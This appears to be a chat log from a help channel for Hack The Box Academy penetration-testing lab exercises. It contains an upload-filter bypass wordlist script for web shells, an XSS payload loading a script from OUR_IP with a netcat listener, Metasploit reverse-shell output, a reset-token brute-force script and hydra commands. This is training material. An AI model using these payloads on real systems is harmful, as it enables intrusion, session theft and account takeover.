Absolutely, I used zap for that, but can easily be done with burp or even ffuf

is it fuzzing in zap? im using that cause its faster than burp and I just know how to fuzz the extension and look for the successful updown

upload

Yes, keep an eye on return sizes/codes/header sizes

ya I know that part I been going through all of them that say 26 bytes sending them to the repeater then checking the url

the module shows you exactly how to do it in the previous section, under blacklist filters "fuzzing extensions"

oh ya I know how to do it im just trying to figure how to automate the process so I can check a bunch a once

intruder automates it.. the section shows you how

it goes over loading the wordlist and everything

it checks to see if the url is executable? I thought it just checked if it was successfully uploaded

You can also setup zap/ffuf to go through burp proxy if that's where you like going to get your output and don't feel like waiting

I need to get better with Zap.

PortSwigger's education is just so good...and free.

oh sorry i misunderstood. i don't think it auto-attempts the exploit for you. it might be able to but i don't know burp well enough. if it doesn't you can create extensions yourself with python.

me too

https://medium.com/geekculture/fuzzing-file-uploads-with-burp-intruder-3482a10a32d5

Here fren 🙂

its okay ya I have 106 urls to check hehe

Just remember if you're ever doing this in the real world to limit the number of threads and space out time between requests.

Some people get touchy 😛

Ppppfffft, actionable find not my fault they can't handle my awesomeness

[ERROR] ssh protocol error
[ERROR] all children were disabled due too many connection errors```

thank you ya it would be fun too know enough to challange myself to evasion of certain defense tool like that

You don't need to check them all. There are only a handful of php files that actually execute code, and the upload filter is blocking a bunch of stuff. It sounds to me like you did something wrong, because you shouldn't be able to upload every single payload.

Damn man. Any better luck on another port?

you can simply sort by response size to see which ones made it through

FTP does something similar.

I'm honestly just checking it one more time for kicks.

TCP or UDP for the VPN?

TCP I believe.

But it did the same thing on pwnbox.

Eh that should rule out VPN/Internet

Oh wait...

😐

IT DEFAULTED TO UDP.

here's what im looking at i don't what I did wrong

Give ftp and TCP with a low thread count

Is 4 low enough?

Should be

Please tell me this isn't on the test...

If it goes long enough w/o error you could kick it up to 36 or 48 to speed up the process

Yeah I use ZAP but not super familiar. I can guide you to do it in Burp, but the example itself shows that phtml gets rejected in uploading so you're not doing something right, maybe you're encoding the period or something in the extensions.

user-agent...?

Iirc the blacklist is only like 26 extensions, not sure why you have : in your file names

ok we can do that

[STATUS] 36.00 tries/min, 108 tries in 00:03h, 6892 to do in 03:12h, 4 active

oh true good catch, the : is probably messing things up

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

it said to use this script and add more extensions

so I edit it like this
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

Looks promising

some of the examples they gave didn't give then the right extensive so I had to figure it by myself so that what I thought this section was doing

yeah bro thats how it be just think outside of thr box sometimes lol

Yeah the examples here just show you how to do it, the challenges are different from the examples in the module so you have to apply what the section teaches to find it.

yupp

ya I like that

Did someone finish https://academy.hackthebox.com/module/113/section/2164? What ip should be added to /etc/hosts? After i unzipped the .jar file and recompiled again I still get the "connection error!" meesage.

<@&861185840277487616>

The IP in the module does not work?

No.

Or I do something wrong.

This module is so poorly explained.

And you removed the hashes from the meta inf?

Yes.

It looks like a connection problem.

You watch ippsec's fatty video?

Yeah, I saw that he also used 10.10.10.174

probably the worst section of any module on the whole platform

the box you're working on is 'fatty' on htb's main platform, many people watch ippsec's video on that to get past this part of the module. that might help you too if you want to look it up.

It's not worst it's horrible. 😄

Yeah I found it. It's so nice explained.

My two cents is to read every twice on what you're about to do then double check as you're doing it.

I read everything more than twice and I have a hard remembering lol

Hey, once you have the port number changed, remember to add the extra line and delete the files it says to

They said to add that ip in hosts, but they don't tell you what is with that ip. So basically i tried some kind of fuzzing and I added my machine ip, the target ip, the ip given in the module, and finally all the adaptors ip adresses... and found that I had to add the other adaptor ip. 🙂

I went through this with someone recently and they indeed had everything right but we actually removed that etc hosts line and it worked after that

For if you're working on pwnbox that is. Maybe give it a shot. The etc/hosts looked weird too so might be worth checking

Nice 🎉

I am currently stuck at Section: Session Hijacking for Module: Cross-Site Scripting XSS.

Question: I have tried the different payloads in the full name, username, image url fields. The payload format: <script src=http://OUR_IP:8001/field_name></script>, and submit the form, why cant i find any vulnerable field.

Before submitting the payload, I have set up netcat listener ```
sudo nc -lvnp 8001

Does it need a character to begin the payload?

Think of how html looks and how your code would look if you were to just plop it in there. Maybe there's something you can do to clean it up a bit.

ok perhaps i will try the diff payloads with diff starting characters

im thinking along the line of inspecting the source code, and see how the input are being inserted into the code

No need to dig that deep, just mock it up in notepad

Try " in the beggining to close the current html tag, then add your script, and open another html tag to close the one you're in if that make sense? to keep the syntax clean

ok i get what you mean, thanks for the direction

i managed to solve and retrieve the flag, thanks for the tip

Nice one

Nice 😄

I am currently working on a module called "https://academy.hackthebox.com/module/39/section/407" and attempting to execute its only exercise.
However, I am encountering the same output every time, despite my attempts to modify the payloads and RPORTS:

[msf](Jobs:0 Agents:0) exploit(linux/http/apache_druid_js_rce) >> run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Using URL: http://10.0.2.15:8080/JGFkg4uMmdo
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.

I have tried several variations but with no success. Is anyone else experiencing the same issue?

Are you able to obtain a meterpreter shell at all?

10.0.2.15 is your tun0?

let me check

Can anyone help me with the question on htb academy?

What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.

the modules are broken down into sections. it looks like the question is asking you what the first section of the module is named.

if you look at the table of contents on the right, you can see each page of the module is broken down into different sections

Pwnboxes in Academy are not spawning. Could someone look into this?

It says "Request validation failed."

It also seems they are all down (UK, DE, ...).

hi

ik i cant ask things in this channel

i cant login

yes, 500.000k $

hehe nice joke

but i am serious tho

this is not the server for your request

I was using the wrong NIC. I gotta say, you spotted my mistake pretty quick. Thanks for the tip

please read #rules @rustic sage

ok

sorry i was just so desperate

create new account

i spent money in it

@steady dust

email support

But when I typed Introduction, he said there was an error.

You said your issue was logging in, in which case you should email support. This isn't really a support channel for that kind of stuff and no one in here can assist you in logging in to your account.

No! This is the question

What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.

what module is it

But when i enter "Introduction

It's a wrong anser

what is the name of the module

ok well i looked it up, you got the answer right

make sure ther are no whitespaces etc

anyone else having vpn issues? got around 100% packet loss xD

This just a question on htb academy

which Module you on?

he's on this, and he has the correct answer, so likely a browser issue or him just mistyping. https://academy.hackthebox.com/module/15/section/34

hmm maybe whitespace after the word he needs to remove, happened to me multiple times stuff like that xD

I would rather use a simple msfvenom to create an *.msi file to get the priv I am looking for!

Try migrating to a more stable process 😉

Start first by doing a good recon, use SharpUP.exe 🙂

impacket-secretdump is your firend!

why are you replying to a 2 year old message

better late than never 😄

Guys what is the solution to this question ? 👇

Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

It's been two days and I haven't been able to solve the question !

providing the module and section would be useful

but here #modules message

Guys, im doing the AD skill assessment part 1. I need help how to connect to MS01?

pivot

I tried again and again, but to no avail

my reset_token_time.py :

`from hashlib import md5
import requests
from sys import exit
from time import time

url = "http://X/question1/"

to have a wide window try to bruteforce starting from 120seconds ago

now = 1713413551000
start_time = now - 1000
fail_text = "Wrong token"

username = "htbadmin"

loop from start_time to now. + 1 is needed because of how range() works

for x in range(start_time, now + 1000):
# get token md5
md5_token = md5((username + str(x)).encode()).hexdigest()
data = {
"submit": "check",
"token": md5_token
}

print("checking {} {}".format(str(x), md5_token))

# send the request
res = requests.post(url, data=data)

# response text check
if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()`

follow the message that I linked

I followed it

are you converting the timestamp?

I am having trouble with the exercise in this section module:

https://academy.hackthebox.com/module/57/section/487

" Try running the same exercise on the question from the previous section, to learn how to brute force for users. "
||
"hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt -u -f 94.237.56.188 -s 56695 http-get /
"||

I ran the above command and so far its been running for several minutes

I haven't done that module, but looking at the question it's asking you to bruteforce a username. The section directly before the question "Username Brute Force" tells you exactly what you need to do here. Your command is going to go through every single username and every single password in the rockyou.txt list.

||I know its going to be the exact same answer as the last question , but I wanted to get that result using the approaches in this module section.||

my answer is the approach the module gives you

the answer is your command is wrong

follow the command in the module instead

I think you're supposed to use the password that you know and give it a user list instead

I did

the example you posted in here with your message is not the correct command

the command in the module used a single password

should it work with netsh.exe?

Okay . Fixed it

ngr

what?

Just hit 100% on CPTS path. Wanted to say thanks to all the legends here that helped me out along the way. It's in God's hands now

Any hint on how to transfer socks over RDP server. Exe for academy.hackthebox.com/module/158/section/1439 scp doesn’t work, python server doesn’t work

Invoke doesn’t work

Heyo working on Passwords Attacks - Network Services.. I have cracked some logins using Hydra and the provided lists but when I try to RDP with xfreerdp I get a connect cancelled 😦 Anybody got an idea?

Provide a real link yours doesn't work

OKAY, ill just give up for today, cant even do an nmap scan without waiting an hour xD

Can anyone give me a clear hint which file transfer method is best

That’s all I’m asking

there is no 'best', the different methods are for different situations

if you provide the module/question you're working on you'd get a better answer

RDP transfer it is

http/s def works over pivots, you probably set something wrong

Rdp and socks tunneling with socks over RDP

I’ll try it again

ahh yeah i used the mstsc.exe like that section shows

I see it now. So it says to download it first but it says after that use mats and enable it the directions are a bit backwards

Mstsc

remember to run cmd as admin and disable real-time protection

Thanks bud

Im having an issue with one of the modules. Data is missing. Where can I report this issue?

Hey everyone, I'm stuck on the skill assessment of the command injection module, I can't find the injection point. Can anyone give me a hint please?

Click on every single link with BurpSuite proxy on, look at each request you make and think about what actions the website performs that would cause it to run a system command as you go through them all.

Reach out to support

Thanks, I'll do this

I wrote a power shell script to serve over 8000

Worked

I have downloaded the dll and the .exe but the DLL module was loaded but the entry point DLL register server was not found, this is brutal

you got the DLL loaded?

Yes and there was no real time protection on victor to begin with

I brought it over both the DLL to victor and the .exe,

the exe doesn't work on victor or something?

Plugin not loaded on client side 31

Need a little hand on WEB SERVICE & API ATTACKS: Web Service & API Attacks - Skills Assessment
Question:
Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.

Crafted a python script for the SQL injection, tried different sql injection commands but couldn't find the password for the admin
Can anyone give a nudge to solve this?

Got the flag, I missed one feature of the website, thanks for the advice

yo draries

I'm experiencing since the start of the week.

<@&861185840277487616>

Nice glad you got it!

lol im doimg thr command injextion module atm

Mine were all 2000ms ping yesterday

i found the ans but its not accepting it can i verify with someone the ans

check the hint for the expected format

still timeout, any hints?

AD Enumeration & Attacks - Skills Assessment Part I im on the last question How to get access to DC01 any hints?

do that attack

yeah the attack from question 7

hello i was doing a module and this command worked 'php://filter/convert.base64-encode/resource=index' but not 'php://filter/convert.base64-encode/resource=index.php'. does this mean the index file is not a php file?

@cloud urchin Hey on the file uploads attack module should I use that script to create a wordlist

what script

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

im on the whitelist filters in the file uploads attack

yeah i think you'll need to do that for that one

ok

also i do recommend just in case adding all of the php extensions so you have a higher chance of finding one that works

i believe its bc it automatically adds a .php at the end of the index so if u add index.php it will show up as index.php.php which wont work